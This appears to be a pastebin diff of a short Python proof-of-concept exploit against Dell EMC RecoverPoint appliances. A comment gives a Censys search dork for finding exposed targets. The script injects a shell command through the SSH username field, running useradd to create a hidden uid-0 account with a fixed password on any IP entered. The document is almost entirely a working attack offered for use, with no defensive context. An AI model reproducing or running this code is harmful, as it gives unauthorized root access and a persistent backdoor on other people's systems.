SHOW:
|
|
- or go back to the newest paste.
| 1 | #!/usr/bin/python | |
| 2 | - | # Dell EMC Recoverpoint Single-Host Code Injection PoC By; LiGhT |
| 2 | + | # Dell EMC Recoverpoint Single-Host Code Injection PoC Creds to LiGhT |
| 3 | # censys dork: ((RecoverPoint) AND protocols.raw: "22/ssh") AND protocols.raw: "22/ssh" | |
| 4 | import sys, re, os, paramiko, time | |
| 5 | ||
| 6 | paramiko.util.log_to_file("/dev/null")
| |
| 7 | def main(): | |
| 8 | try: | |
| 9 | ip = raw_input("IP: ")
| |
| 10 | username = "$(useradd -ou0 -g0 bao7uo -p`openssl passwd -1 Secret123`)" | |
| 11 | u1 = "bao7uo" | |
| 12 | u2 = "Secret123" | |
| 13 | port = 22 | |
| 14 | ssh = paramiko.SSHClient() | |
| 15 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) | |
| 16 | print "Connecting to "+ip+" USER-EXPLOIT "+username | |
| 17 | ssh.connect(ip, port = port, username=username, timeout=3) | |
| 18 | ssh.close() | |
| 19 | #ssh.connect(ip, port = port, username=u1, password=u2, timeout=3) | |
| 20 | #print "ho" | |
| 21 | except: | |
| 22 | pass | |
| 23 | ||
| 24 | main() |
